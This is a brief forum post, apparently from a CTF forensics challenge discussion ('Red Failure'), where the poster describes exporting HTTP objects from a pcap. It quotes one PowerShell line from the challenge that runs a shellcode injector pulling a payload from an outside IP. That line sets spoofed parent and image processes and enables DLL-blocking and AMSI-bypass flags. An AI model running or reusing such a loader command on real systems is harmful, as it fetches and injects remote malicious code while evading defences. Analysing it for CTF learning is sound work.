Red Failure Discussion [FORENSICS]

Let’s discuss Red Failure. Please do not share any flags or writeups.

Exported http objects from the pcap file

Inspected the ps script

PS C:\> ${c`MD}
currentthread /sc:http://147.182.172.189:80/9tVI0 /password:z64&Rx27Z$B%73up /image:C:\Windows\System32\svchost.exe /pid:notepad /ppid:explorer /dll:msvcp_win.dll /blockDlls:True /am51:True

That’s it with RE Corner - scdbg download